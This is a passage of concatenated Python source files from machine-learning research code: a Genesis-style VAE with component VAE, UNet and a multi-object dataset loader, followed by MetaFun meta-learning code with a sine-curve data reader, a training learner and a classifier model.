BroadcastDecoder(in_chnls=self.ldim, out_chnls=64, h_chnls=64,
num_layers=4, img_dim=cfg.img_size,
act=nn.ELU()),
nn.ELU()
)
self.vae.p_x_mean = nn.Conv2d(64, nin, 1, 1, 0)
def forward(self, x):
""" x (torch.Tensor): Input images [batch size, 3, dim, dim] """
# Forward propagation
recon, stats = self.vae(x)
if self.pixel_bound:
recon = torch.sigmoid(recon)
# Reconstruction loss
p_xr = Normal(recon, self.pixel_std)
err = -p_xr.log_prob(x).sum(dim=(1, 2, 3))
# KL divergence loss
p_z = Normal(0, 1)
# TODO(martin): the parsing below is not very intuitive
# -- No flow
if 'z' in stats:
q_z = Normal(stats.mu, stats.sigma)
kl = q_z.log_prob(stats.z) - p_z.log_prob(stats.z)
kl = kl.sum(dim=1)
# -- Using normalising flow
else:
q_z_0 = Normal(stats.mu_0, stats.sigma_0)
kl = q_z_0.log_prob(stats.z_0) - p_z.log_prob(stats.z_k)
kl = kl.sum(dim=1) - stats.ldj
# Tracking
losses = AttrDict(err=err, kl_l=kl)
return recon, losses, stats, None, None
def sample(self, batch_size, *args, **kwargs):
# Sample z
z = Normal(0, 1).sample([batch_size, self.ldim])
# Decode z
x = self.vae.decode(z)
if self.pixel_bound:
x = torch.sigmoid(x)
return x, AttrDict(z=z)
def get_features(self, image_batch):
with torch.no_grad():
_, _, stats, _, _ = self.forward(image_batch)
return stats.z
```
#### File: genesis/modules/component_vae.py
```python
from attrdict import AttrDict
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.distributions.normal import Normal
import genesis.modules.blocks as B
from genesis.modules.encoders import MONetCompEncoder
from genesis.modules.decoders import BroadcastDecoder
class ComponentVAE(nn.Module):
def __init__(self,
img_size,
nout,
comp_ldim=15,
comp_enc_channels=32,
comp_dec_channels=32,
comp_dec_layers=4,
montecarlo_kl=True,
pixel_bound=True,
act=F.relu):
super(ComponentVAE, self).__init__()
self.ldim = comp_ldim # paper uses 16
self.montecarlo = montecarlo_kl
self.pixel_bound = pixel_bound
# Sub-Modules
self.encoder_module = MONetCompEncoder(img_size=img_size,
input_channels=3,
comp_enc_channels=comp_enc_channels,
comp_ldim=comp_ldim,
act=act)
self.decoder_module = BroadcastDecoder(
in_chnls=self.ldim,
out_chnls=nout,
h_chnls=comp_dec_channels,
num_layers=comp_dec_layers,
img_dim=img_size,
act=act
)
def forward(self, x, log_mask):
"""
Args:
x (torch.Tensor): Input to reconstruct [batch size, 3, dim, dim]
log_mask (torch.Tensor or list of torch.Tensors):
Mask to reconstruct [batch size, 1, dim, dim]
"""
# -- Check if inputs are lists
K = 1
b_sz = x.size(0)
if isinstance(log_mask, list) or isinstance(log_mask, tuple):
K = len(log_mask)
# Repeat x along batch dimension
x = x.repeat(K, 1, 1, 1)
# Concat log_m_k along batch dimension
log_mask = torch.cat(log_mask, dim=0)
# -- Encode
mask = log_mask.exp()
x *= mask
x = torch.cat((log_mask, x), dim=1)
mu, sigma = self.encode(x)
# -- Sample latents
q_z = Normal(mu, sigma)
# z - [batch_size * K, l_dim] with first axis: b0,k0 -> b0,k1 -> ...
z = q_z.rsample()
# -- Decode
# x_r, m_r_logits = self.decode(z)
x_r = self.decode(z)
# -- Track quantities of interest and return
x_r_k = torch.chunk(x_r, K, dim=0)
z_k = torch.chunk(z, K, dim=0)
mu_k = torch.chunk(mu, K, dim=0)
sigma_k = torch.chunk(sigma, K, dim=0)
stats = AttrDict(mu_k=mu_k, sigma_k=sigma_k, z_k=z_k)
return x_r_k, stats
def encode(self, x):
x = self.encoder_module(x)
mu, sigma_ps = torch.chunk(x, 2, dim=1)
sigma = B.to_sigma(sigma_ps)
return mu, sigma
def decode(self, z):
x_hat = self.decoder_module(z)
if self.pixel_bound:
x_hat = torch.sigmoid(x_hat)
return x_hat
def sample(self, batch_size=1, steps=1):
raise NotImplementedError
```
#### File: genesis/modules/unet.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from genesis.modules.blocks import INConvBlock, Flatten
class UNet(nn.Module):
def __init__(self, num_blocks, filter_start=32):
super(UNet, self).__init__()
# TODO(martin) generalise to other cases if nedded
c = filter_start
if num_blocks == 4:
self.down = nn.ModuleList([
INConvBlock(4, c),
INConvBlock(c, 2*c),
INConvBlock(2*c, 2*c),
INConvBlock(2*c, 2*c), # no downsampling
])
self.up = nn.ModuleList([
INConvBlock(4*c, 2*c),
INConvBlock(4*c, 2*c),
INConvBlock(4*c, c),
INConvBlock(2*c, c)
])
elif num_blocks == 5:
self.down = nn.ModuleList([
INConvBlock(4, c),
INConvBlock(c, c),
INConvBlock(c, 2*c),
INConvBlock(2*c, 2*c),
INConvBlock(2*c, 2*c), # no downsampling
])
self.up = nn.ModuleList([
INConvBlock(4*c, 2*c),
INConvBlock(4*c, 2*c),
INConvBlock(4*c, c),
INConvBlock(2*c, c),
INConvBlock(2*c, c)
])
elif num_blocks == 6:
self.down = nn.ModuleList([
INConvBlock(4, c),
INConvBlock(c, c),
INConvBlock(c, c),
INConvBlock(c, 2*c),
INConvBlock(2*c, 2*c),
INConvBlock(2*c, 2*c), # no downsampling
])
self.up = nn.ModuleList([
INConvBlock(4*c, 2*c),
INConvBlock(4*c, 2*c),
INConvBlock(4*c, c),
INConvBlock(2*c, c),
INConvBlock(2*c, c),
INConvBlock(2*c, c)
])
self.mlp = nn.Sequential(
Flatten(),
nn.Linear(4*4*2*c, 128), nn.ReLU(),
nn.Linear(128, 128), nn.ReLU(),
nn.Linear(128, 4*4*2*c), nn.ReLU()
)
self.final_conv = nn.Conv2d(c, 1, 1)
def forward(self, x):
batch_size = x.size(0)
x_down = [x]
skip = []
for i, block in enumerate(self.down):
act = block(x_down[-1])
skip.append(act)
if i < len(self.down)-1:
act = F.interpolate(act, scale_factor=0.5, mode='nearest', recompute_scale_factor=True)
x_down.append(act)
x_up = self.mlp(x_down[-1]).view(batch_size, -1, 4, 4)
for i, block in enumerate(self.up):
features = torch.cat([x_up, skip[-1 - i]], dim=1)
x_up = block(features)
if i < len(self.up)-1:
x_up = F.interpolate(x_up, scale_factor=2.0, mode='nearest', recompute_scale_factor=True)
return self.final_conv(x_up), {}
```
#### File: gsubsampling/multi_object_datasets/load.py
```python
import os
import sys
from multi_object_datasets import clevr_with_masks, multi_dsprites
import numpy as np
import tensorflow as tf
from tqdm import tqdm
import urllib.request
from absl import app
from absl import flags
FLAGS = flags.FLAGS
flags.DEFINE_string('dataset', 'multi_dsprites', 'Name of the dataset')
flags.DEFINE_string('datadir', '/tmp', 'Root directory for data storage')
flags.DEFINE_integer('batch_size', 50, 'Batch size for iterating the dataset')
flags.DEFINE_integer('num_examples', 100000, 'Total number of datapoint used.')
def main(argv):
if FLAGS.dataset == 'multi_dsprites':
tf_records_path = os.path.join(FLAGS.datadir, "multi_dsprites_colored_on_colored.tfrecords")
if not os.path.exists(tf_records_path):
url = "https://storage.googleapis.com/multi-object-datasets/multi_dsprites/multi_dsprites_colored_on_colored.tfrecords"
print("Downloading from {}".format(url))
urllib.request.urlretrieve(url, tf_records_path)
fullpath = os.path.join(FLAGS.datadir, "multi_dsprites")
if not os.path.exists(fullpath):
os.makedirs(fullpath)
dataset = multi_dsprites.dataset(tf_records_path, 'colored_on_colored')
elif FLAGS.dataset == 'clevr':
tf_records_path = os.path.join(FLAGS.datadir, "clevr_with_masks_train.tfrecords")
if not os.path.exists(tf_records_path):
url = "https://storage.googleapis.com/multi-object-datasets/clevr_with_masks/clevr_with_masks_train.tfrecords"
print("Downloading from {}".format(url))
urllib.request.urlretrieve(url, tf_records_path)
fullpath = os.path.join(FLAGS.datadir, "clevr")
if not os.path.exists(fullpath):
os.makedirs(fullpath)
dataset = clevr_with_masks.dataset(tf_records_path)
batched_dataset = dataset.batch(FLAGS.batch_size)
iterator = tf.compat.v1.data.make_one_shot_iterator(batched_dataset)
FLAGS.num_examples = 100000
mmap_image, mmap_mask = None, None
n = 0
latents = {}
for idx, batch in tqdm(enumerate(iterator)):
if FLAGS.dataset == 'clevr':
image = batch['image'][:, 29:221, 64:256, :]
image = tf.image.resize(image, [64, 64], method=tf.image.ResizeMethod.BILINEAR)
image = tf.transpose(image, perm=[0,3,1,2])
mask = batch['mask'][:, :, 29:221, 64:256, :]
s = mask.get_shape().as_list()
mask = tf.image.resize(tf.reshape(mask, [s[0]*s[1], s[2], s[3], s[4]]), [64, 64], method=tf.image.ResizeMethod.BILINEAR)
mask = tf.reshape(mask, [s[0], s[1], 64, 64, s[4]])
mask = tf.transpose(mask, perm=[0,1,4,2,3])
elif FLAGS.dataset == 'multi_dsprites':
image = tf.transpose(batch['image'], perm=[0,3,1,2])
mask = tf.transpose(batch['mask'], perm=[0,1,4,2,3])
if mmap_image is None:
mmap_image = np.memmap(os.path.join(fullpath, "{}-image.npy".format(FLAGS.dataset)), dtype=np.uint8, mode='w+', shape=tuple([FLAGS.num_examples]+image.get_shape().as_list()[1:]))
if mmap_mask is None:
mmap_mask = np.memmap(os.path.join(fullpath, "{}-mask.npy".format(FLAGS.dataset)), dtype=np.uint8, mode='w+', shape=tuple([FLAGS.num_examples]+mask.get_shape().as_list()[1:]))
b = min(int(image.shape[0]), FLAGS.num_examples-n)
mmap_image[n:n+b] = image[:b].numpy()
mmap_image.flush()
mmap_mask[n:n+b] = mask[:b].numpy()
mmap_mask.flush()
n += b
for k, v in batch.items():
if k not in ['image', 'mask']:
if k not in latents:
latents[k] = v.numpy()
else:
latents[k] = np.concatenate([latents[k], v.numpy()], axis=0)
if n >= FLAGS.num_examples:
break
np.savez_compressed(os.path.join(fullpath, "{}-latent.npz".format(FLAGS.dataset)), **latents)
print("{0} dataset containing {1} examples has been generated at {2}".format(FLAGS.dataset, FLAGS.num_examples, fullpath))
if __name__ == '__main__':
app.run(main)
``` |
{
"source": "jinxu06/MetaFun-Tensorflow",
"score": 2
} |
#### File: MetaFun-Tensorflow/data/sine_curves.py
```python
import collections
from absl import flags
import numpy as np
import tensorflow as tf
FLAGS = flags.FLAGS
flags.DEFINE_integer(
"max_num_context", 20, "maximal number of context points. for regression)")
RegressionDescription = collections.namedtuple(
"RegressionDescription",
("tr_input", "tr_output", "tr_func", "val_input", "val_output", "val_func"))
class SineCurvesReader(object):
def __init__(self,
batch_size,
max_num_context,
x_size=1,
y_size=1,
random_kernel_parameters=False,
testing=False, seed=None):
self._batch_size = batch_size
self._max_num_context = max_num_context
self._x_size = x_size
self._y_size = y_size
self._random_kernel_parameters = random_kernel_parameters
self._testing = testing
self._seed = seed
def generate_curves(self):
num_context = tf.random.uniform(
shape=[], minval=1, maxval=self._max_num_context, dtype=tf.int32, seed=self._seed)
if self._testing:
num_total_points = 1000
num_target = num_total_points - num_context
x_values = tf.tile(
tf.expand_dims(tf.range(-5., 5., 1. / 100, dtype=tf.float32), axis=0),
[self._batch_size, 1])
x_values = tf.expand_dims(x_values, axis=-1)
else:
num_target = tf.random_uniform(shape=(), minval=1,
maxval=self._max_num_context+1 - num_context,
dtype=tf.int32, seed=self._seed)
num_total_points = num_context + num_target
x_values = tf.random_uniform(
[self._batch_size, num_total_points, self._x_size], -5, 5, seed=self._seed)
amp = tf.random.uniform(shape=[self._batch_size, 1, 1], minval=0.1, maxval=5.0, seed=self._seed)
phase = tf.random.uniform(shape=[self._batch_size, 1, 1], minval=0., maxval=np.pi, seed=self._seed)
frequency = 1.0
func_values = amp * tf.math.sin(frequency * (x_values - phase))
y_values = func_values
# if consider observation noise:
# y_values = func_values + tf.random.normal(shape=tf.shape(func_values), stddev=0.5, seed=self._seed)
if self._testing:
target_x = x_values
target_y = y_values
target_f = func_values
idx = tf.random_shuffle(tf.range(num_total_points), seed=self._seed)
context_x = tf.gather(x_values, idx[:num_context], axis=1)
context_y = tf.gather(y_values, idx[:num_context], axis=1)
context_f = tf.gather(func_values, idx[:num_context], axis=1)
else:
target_x = x_values[:, num_context : num_target + num_context, :]
target_y = y_values[:, num_context : num_target + num_context, :]
target_f = func_values[:, num_context : num_target + num_context, :]
context_x = x_values[:, :num_context, :]
context_y = y_values[:, :num_context, :]
context_f = func_values[:, :num_context, :]
return RegressionDescription(
tr_input=context_x,
tr_output=context_y,
tr_func=context_f,
val_input=target_x,
val_output=target_y,
val_func=target_f)
```
#### File: jinxu06/MetaFun-Tensorflow/learner.py
```python
from six.moves import range
from six.moves import zip
import os
import pickle
import functools
from absl import flags
import numpy as np
import tensorflow as tf
import data.classification as cls_data
from data.sine_curves import SineCurvesReader
import utils
FLAGS = flags.FLAGS
flags.DEFINE_float("outer_lr", 1e-4, "Outer learning rate (Learning rate for the global optimiser).")
flags.DEFINE_integer("training_batch_size", 12, "Number of tasks in a batch for training.")
flags.DEFINE_integer("eval_batch_size", 100, "Number of tasks in a batch for evaluation.")
flags.DEFINE_boolean("no_early_stopping", False, "Whether to remove early_stopping and "
"use the latest model checkpoint.")
flags.DEFINE_boolean("train_on_val", False, "Whether to train on the union of meta-train "
"and meta-validation data.")
class CLearner(object):
def __init__(self, name=""):
self.name = name
self.eval_metric_type = 'acc'
def load_data(self):
assert FLAGS.dataset_name in ['miniImageNet', 'tieredImageNet'], "Unknown dataset name"
self.train_data = cls_data.construct_examples_batch(FLAGS.dataset_name,
FLAGS.training_batch_size, "train", train_on_val=FLAGS.train_on_val)
self.eval_data = cls_data.construct_examples_batch(FLAGS.dataset_name, FLAGS.eval_batch_size, "val")
self.test_data = cls_data.construct_examples_batch(FLAGS.dataset_name, FLAGS.eval_batch_size, "test")
def construct_graph(self, model_cls):
# construct model
self.model = model_cls()
# construct loss and accuracy ops
self.train_loss, self.train_tr_metric, self.train_val_metric = \
_construct_loss_and_eval_ops_for_classification(self.model, self.train_data, is_training=True)
self.train_eval_loss, self.train_eval_tr_metric, self.train_eval_val_metric = \
_construct_loss_and_eval_ops_for_classification(self.model, self.train_data, is_training=False)
self.eval_loss, self.eval_tr_metric, self.eval_val_metric = \
_construct_loss_and_eval_ops_for_classification(self.model, self.eval_data, is_training=False)
self.test_loss, self.test_tr_metric, self.test_val_metric = \
_construct_loss_and_eval_ops_for_classification(self.model, self.test_data, is_training=False)
# construct optimisation ops
training_variables = tf.compat.v1.trainable_variables()
training_gradients = tf.gradients(self.train_loss, training_variables)
training_gradients = utils.clip_gradients(training_gradients, 0, 0) # gradient clipping is not used
optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=FLAGS.outer_lr)
self.global_step = tf.compat.v1.train.get_or_create_global_step()
self.train_op = optimizer.apply_gradients(
list(zip(training_gradients, training_variables)), self.global_step)
def train(self, num_steps_limit, checkpoint_steps, checkpoint_path):
global_step_ev = tf.compat.v1.train.global_step(self.sess, self.global_step)
best_eval_metric = (0.0 if self.eval_metric_type == 'acc' else 1.e16)
while global_step_ev <= num_steps_limit:
if global_step_ev % checkpoint_steps == 0:
# evaluating model when checkpointing
eval_tr_metric_ev, eval_val_metric_ev = utils.evaluate_and_average(
self.sess, [self.eval_tr_metric, self.eval_val_metric], 10)
print("[ Step: {1} meta-valid context_{0}: {2:.5f}, "
"meta-valid target_{0}: {3:.5f} ]".format(self.eval_metric_type,
global_step_ev, eval_tr_metric_ev, eval_val_metric_ev))
# copy best checkpoints for early stopping
if self.eval_metric_type == 'acc':
if eval_val_metric_ev > best_eval_metric:
utils.copy_checkpoint(checkpoint_path, global_step_ev,
eval_val_metric_ev, eval_metric_type=self.eval_metric_type)
best_eval_metric = eval_val_metric_ev
else:
if eval_val_metric_ev < best_eval_metric:
utils.copy_checkpoint(checkpoint_path, global_step_ev,
eval_val_metric_ev, eval_metric_type=self.eval_metric_type)
best_eval_metric = eval_val_metric_ev
self.visualise(save_name="{0}-{1}".format(self.name, global_step_ev))
if global_step_ev == num_steps_limit:
global_step_ev += 1
continue
# train step
_, train_tr_metric_ev, train_val_metric_ev = self.sess.run([self.train_op, self.train_tr_metric, self.train_val_metric])
global_step_ev = tf.compat.v1.train.global_step(self.sess, self.global_step)
def evaluate(self, num_examples=10000, eval_set='val'):
num_estimates = (num_examples // FLAGS.eval_batch_size)
if eval_set == 'train':
tr_metric_ev, val_metric_ev = utils.evaluate_and_average(
self.sess, [self.train_eval_tr_metric, self.train_eval_val_metric], num_estimates)
elif eval_set == 'val':
tr_metric_ev, val_metric_ev = utils.evaluate_and_average(
self.sess, [self.eval_tr_metric, self.eval_val_metric], num_estimates)
elif eval_set == 'test':
tr_metric_ev, val_metric_ev = utils.evaluate_and_average(
self.sess, [self.test_tr_metric, self.test_val_metric], num_estimates)
early_stopping_step = tf.compat.v1.train.global_step(self.sess, self.global_step)
print("[ Evaluation --- context_{0}: {1:.5f}, target_{0}: {2:.5f} @checkpoint step {3} ]".format(self.eval_metric_type, tr_metric_ev, val_metric_ev, early_stopping_step))
return val_metric_ev, early_stopping_step
def visualise(self, save_name="test", num_plots=9):
pass
def set_session(self, sess):
self.sess = sess
def get_session(self):
return self.sess
def _construct_loss_and_eval_ops_for_classification(inner_model, inputs, is_training):
call_fn = functools.partial(inner_model.__call__, is_training=is_training)
per_instance_loss, per_instance_tr_metric, per_instance_val_metric = tf.map_fn(call_fn, inputs, dtype=(tf.float32, tf.float32, tf.float32),
back_prop=is_training)
loss = tf.reduce_mean(per_instance_loss)
tr_metric = tf.reduce_mean(per_instance_tr_metric)
val_metric = tf.reduce_mean(per_instance_val_metric)
return loss, tr_metric, val_metric
class RLearner(CLearner):
def __init__(self, name="", result_path="results"):
super(RLearner, self).__init__(name=name)
self.eval_metric_type = "mse"
self.result_path = result_path
def load_data(self):
if FLAGS.dataset_name == 'sinusoid':
self.train_data = SineCurvesReader(batch_size=FLAGS.training_batch_size,
max_num_context=FLAGS.max_num_context).generate_curves()
self.eval_data = SineCurvesReader(batch_size=FLAGS.eval_batch_size,
max_num_context=FLAGS.max_num_context, testing=True).generate_curves()
self.test_data = self.eval_data
else:
raise NameError("Unknown dataset name")
def construct_graph(self, model_cls):
# model
self.model = model_cls()
# loss and accuracy
train_ops = _construct_loss_and_eval_ops_for_regression(self.model, self.train_data, is_training=True)
self.train_loss, self.train_tr_metric, self.train_val_metric = train_ops[0], train_ops[1], train_ops[2]
eval_ops = _construct_loss_and_eval_ops_for_regression(self.model, self.eval_data, is_training=False)
self.eval_loss, self.eval_tr_metric, self.eval_val_metric, self.eval_tr_input, self.eval_tr_output, \
self.eval_tr_func, self.eval_val_input, self.eval_val_output, self.eval_val_func, self.eval_val_preds, \
self.eval_val_sigma = eval_ops
# optimisation
training_variables = tf.trainable_variables()
training_gradients = tf.gradients(self.train_loss, training_variables)
training_gradients = utils.clip_gradients(training_gradients, 0, 0)
optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=FLAGS.outer_lr)
self.global_step = tf.compat.v1.train.get_or_create_global_step()
self.train_op = optimizer.apply_gradients(
list(zip(training_gradients, training_variables)), self.global_step)
def visualise(self, save_name="", num_plots=9):
tr_input, tr_output, tr_func, val_input, val_output, val_func, preds, sigma = \
self.sess.run([self.eval_tr_input, self.eval_tr_output, self.eval_tr_func,
self.eval_val_input, self.eval_val_output, self.eval_val_func, self.eval_val_preds, self.eval_val_sigma])
preds = np.transpose(preds, axes=[1,0,2,3])
sigma = np.transpose(sigma, axes=[1,0,2,3])
for idx in range(num_plots):
utils.plot_iterative_functions(val_input[idx:idx+1], val_output[idx:idx+1], val_func[idx:idx+1],
tr_input[idx:idx+1], tr_output[idx:idx+1], tr_func[idx:idx+1], preds[:, idx:idx+1],
fname=os.path.join(self.result_path, "{0}/iters-{1}-{2}.png".format(self.name, save_name, idx)))
print("( Figures saved to {} )".format(os.path.join(self.result_path, self.name)))
def _construct_loss_and_eval_ops_for_regression(inner_model, inputs, is_training):
call_fn = functools.partial(inner_model.__call__, is_training=is_training)
per_instance_loss, per_instance_tr_metric, per_instance_val_metric, tr_input, tr_output, tr_func, \
val_input, val_output, val_func, val_preds, val_sigma = tf.map_fn(call_fn, inputs, \
dtype=tuple([tf.float32 for i in range(11)]), back_prop=is_training)
loss = tf.reduce_mean(per_instance_loss)
tr_metric = tf.reduce_mean(per_instance_tr_metric)
val_metric = tf.reduce_mean(per_instance_val_metric)
return loss, tr_metric, val_metric, tr_input, tr_output, tr_func, val_input, val_output, val_func, val_preds, val_sigma
```
#### File: jinxu06/MetaFun-Tensorflow/model.py
```python
from six.moves import zip
import math
from absl import flags
import numpy as np
import tensorflow as tf
import sonnet as snt
from tensorflow.contrib.layers import layer_norm
import data.classification as cls_data
FLAGS = flags.FLAGS
# Model Specification
flags.DEFINE_integer("num_iters", 1, "Number of iterations (T).")
flags.DEFINE_integer("dim_reprs", 64, "Dimension of the functional representation outputs (dim(r(x))).")
flags.DEFINE_integer("nn_size", 64, "Size of hidden layers in neural modules.")
flags.DEFINE_integer("nn_layers", 3, "Number of MLP layers in neural modules.")
flags.DEFINE_integer("embedding_layers", 1, "Num of embedding mlp layers.")
flags.DEFINE_float(
"initial_inner_lr", 1.0, "The initial learning rate for functional updates.")
flags.DEFINE_boolean("use_kernel", False, "If True, use kernel; If False, use attention.")
flags.DEFINE_boolean("use_gradient", False, "If True, use gradient-based local updater; "
"If False, use neural local updater.")
flags.DEFINE_boolean("no_decoder", False, "Whether to remove decoder and directly use the functional "
"representation as the predictor .")
flags.DEFINE_string("initial_state_type", "zero", "Type of initial state (zero/constant/parametric)")
flags.DEFINE_string("attention_type", "dot_product", "Type of attention (only dot_product is supported now)")
flags.DEFINE_string("kernel_type", "se", "Type of kernel functions (se/deep_se)")
flags.DEFINE_boolean("repr_as_inputs", False, "If true, use reprs as inputs to the decoder; "
"If false, use reprs to generate weights of the predictor.")
# Regularisation
flags.DEFINE_float("dropout_rate", 0.0, "Rate of dropout.")
flags.DEFINE_float("l2_penalty_weight", 1e-8, "The weight measuring the "
"importance of the l2 regularization in the final loss. See λ₁ "
"in LEO paper.")
flags.DEFINE_float("orthogonality_penalty_weight", 1e-3, "The weight measuring "
"the importance of the decoder orthogonality regularization "
"in the final loss. See λ₂ in LEO paper.")
flags.DEFINE_float("label_smoothing", 0.0, "Label smoothing for classification tasks.")
class MetaFunClassifier(snt.AbstractModule):
def __init__(self, name="MetaFunClassifier"):
super(MetaFunClassifier, self).__init__(name=name)
self._float_dtype = tf.float32
self._int_dtype = tf.int32
# Components configurations
self._use_kernel = FLAGS.use_kernel
self._use_gradient = FLAGS.use_gradient
self._attention_type = FLAGS.attention_type
self._kernel_type = FLAGS.kernel_type
self._no_decoder = FLAGS.no_decoder
if self._no_decoder:
self._dim_reprs = 1
self._initial_state_type = FLAGS.initial_state_type
# Architecture configurations
self._nn_size = FLAGS.nn_size
self._nn_layers = FLAGS.nn_layers
self._dim_reprs = FLAGS.dim_reprs
self._num_iters = FLAGS.num_iters
self._embedding_layers = FLAGS.embedding_layers
# Regularisation configurations
self._l2_penalty_weight = FLAGS.l2_penalty_weight
self._dropout_rate = FLAGS.dropout_rate
self._label_smoothing = FLAGS.label_smoothing
self._orthogonality_penalty_weight = FLAGS.orthogonality_penalty_weight
# Data configurations
self._num_classes = FLAGS.num_classes
self._num_tr_examples_per_class = FLAGS.num_tr_examples_per_class
self._num_val_examples_per_class = FLAGS.num_val_examples_per_class
# Other configurations
self._initial_inner_lr = FLAGS.initial_inner_lr
self._nonlinearity = tf.nn.relu
def _build(self, data, is_training=True):
data = cls_data.ClassificationDescription(*data)
self.is_training = is_training
self.embedding_dim = data.tr_input.get_shape()[-1].value
# initial states
tr_reprs = self.forward_initialiser(data.tr_input)
val_reprs = self.forward_initialiser(data.val_input)
# inner learning rate
alpha = tf.compat.v1.get_variable("alpha", [1, 1], dtype=self._float_dtype,
initializer=tf.constant_initializer(self._initial_inner_lr), trainable=True)
# iterative functional updating
for k in range(self._num_iters):
updates = self.forward_local_updater(tr_reprs, data.tr_output, data.tr_input)
tr_updates = alpha * self.forward_kernel_or_attention(querys=data.tr_input, keys=data.tr_input, values=updates)
val_updates = alpha * self.forward_kernel_or_attention(querys=data.val_input, keys=data.tr_input, values=updates)
tr_reprs += tr_updates
val_reprs += val_updates
# decode functional representation
classifier_weights = self.forward_decoder(tr_reprs)
tr_loss, tr_metric = self.calculate_loss_and_acc(
data.tr_input, data.tr_output, classifier_weights)
classifier_weights = self.forward_decoder(val_reprs)
val_loss, val_metric = self.calculate_loss_and_acc(
data.val_input, data.val_output, classifier_weights)
# aggregate loss and metrics in a batch
batch_tr_loss = tf.reduce_mean(val_loss)
batch_tr_metric = tf.reduce_mean(tr_metric)
batch_val_loss = tf.reduce_mean(val_loss)
batch_val_metric = tf.reduce_mean(val_metric)
#
regularization_penalty = (
self._l2_regularization + self._decoder_orthogonality_reg)
return batch_val_loss + regularization_penalty, batch_tr_metric, batch_val_metric
### Initialiser r_0(x) ###
@snt.reuse_variables
def forward_initialiser(self, x):
num_points = tf.shape(x)[0]
if self._initial_state_type == "parametric":
reprs = self.parametric_initialiser(x)
elif self._initial_state_type == "constant":
reprs = self.constant_initialiser(num_points, trainable=True)
elif self._initial_state_type == 'zero':
reprs = self.constant_initialiser(num_points, trainable=False)
else:
raise NameError("Unknown initial state type")
tf.compat.v1.logging.info("forwarded {0} initialiser".format(self._initial_state_type))
return reprs
# r_0(x) = c
@snt.reuse_variables
def constant_initialiser(self, num_points, trainable=False):
with tf.compat.v1.variable_scope("constant_initialiser"):
if trainable:
init = tf.compat.v1.get_variable(
"initial_state", [1, self._dim_reprs],
dtype=self._float_dtype,
initializer=tf.constant_initializer(0.0), trainable=True)
else:
init = tf.zeros([1, self._dim_reprs])
init = tf.tile(init, [num_points, 1])
init = tf.concat([init for c in range(self._num_classes)], axis=-1)
return init
# r_0(x) = MLP(x)
@snt.reuse_variables
def parametric_initialiser(self, x):
with tf.compat.v1.variable_scope("parametric_initialiser"):
after_dropout = tf.nn.dropout(x, rate=self.dropout_rate)
regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
module = snt.nets.MLP(
[self._nn_size] * self._nn_layers + [self._dim_reprs],
activation=self._nonlinearity,
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
)
outputs = snt.BatchApply(module, n_dims=1)(after_dropout)
outputs = tf.concat([outputs for c in range(self._num_classes)], axis=-1)
return outputs
### Local Updater u ###
@snt.reuse_variables
def forward_local_updater(self, r, y, x=None, iter=""):
if self._use_gradient:
updates = self.gradient_local_updater(r=r, y=y, x=x, iter=iter)
tf.compat.v1.logging.info("forwarded gradient local updater")
else:
r_shape = r.shape.as_list()
r = tf.reshape(r, r_shape[:-1] +[self._num_classes, r_shape[-1]//self._num_classes])
updates = self.neural_local_updater(r=r, y=y, x=x, iter=iter)
updates = tf.reshape(updates, shape=r_shape)
tf.compat.v1.logging.info("forwarded neural local updater")
return updates
#
@snt.reuse_variables
def neural_local_updater(self, r, y, x=None, iter=""):
with tf.compat.v1.variable_scope("neural_local_updater{}".format(iter), reuse=tf.compat.v1.AUTO_REUSE):
y = tf.one_hot(y, self._num_classes)
y = tf.transpose(y, perm=[0, 2, 1])
# reprs = tf.nn.dropout(reprs, rate=self.dropout_rate)
regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
# MLP m
module1 = snt.nets.MLP(
[self._nn_size] * self._nn_layers,
activation=self._nonlinearity,
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
)
outputs = snt.BatchApply(module1, n_dims=2)(r)
agg_outputs = tf.reduce_mean(outputs, axis=-2, keepdims=True)
outputs = tf.concat([outputs, tf.tile(agg_outputs, [1,self._num_classes,1])], axis=-1)
# MLP u+
module2 = snt.nets.MLP(
[self._nn_size] * self._nn_layers + [self._dim_reprs],
activation=self._nonlinearity,
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
name="true",
)
outputs_t = snt.BatchApply(module2, n_dims=2)(outputs)
# MLP u-
module3 = snt.nets.MLP(
[self._nn_size] * self._nn_layers + [self._dim_reprs],
activation=self._nonlinearity,
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
name="false",
)
outputs_f = snt.BatchApply(module3, n_dims=2)(outputs)
outputs = outputs_t * y + outputs_f * (1-y)
return outputs
# gradient-based local updater, used in ablation study
@snt.reuse_variables
def gradient_local_updater(self, r, y, x=None, iter=""):
with tf.compat.v1.variable_scope("gradient_local_updater{}".format(iter), reuse=tf.compat.v1.AUTO_REUSE):
lr = tf.compat.v1.get_variable(
"lr", [1, self._num_classes * self._dim_reprs],
dtype=self._float_dtype,
initializer=tf.constant_initializer(1.0), trainable=True)
classifier_weights = self.forward_decoder(r)
tr_loss, _= self.calculate_loss_and_acc(
x, y, classifier_weights)
batch_tr_loss = tf.reduce_mean(tr_loss)
loss_grad = tf.gradients(batch_tr_loss, r)[0]
updates = - lr * loss_grad
return updates
### Kernel and Attention ###
@snt.reuse_variables
def forward_kernel_or_attention(self, querys, keys, values, iter=""):
if self._use_kernel:
if self._kernel_type == "se":
rtn_values = self.squared_exponential_kernel(querys, keys, values, iter=iter)
elif self._kernel_type == 'deep_se':
rtn_values = self.deep_se_kernel(querys, keys, values, iter=iter)
else:
raise NameError("Unknown kernel type")
tf.compat.v1.logging.info("forwarded {0} kernel".format(self._kernel_type))
else:
rtn_values = self.attention_block(querys, keys, values, iter=iter)
tf.compat.v1.logging.info("forwarded {0} attention".format(self._attention_type))
return rtn_values
@snt.reuse_variables
def squared_exponential_kernel(self, querys, keys, values, iter=""):
num_keys = tf.shape(keys)[0]
num_querys = tf.shape(querys)[0]
with tf.compat.v1.variable_scope("squared_exponential_kernel{}".format(iter), reuse=tf.compat.v1.AUTO_REUSE):
sigma = tf.compat.v1.get_variable("sigma", shape=(), dtype=self._float_dtype,
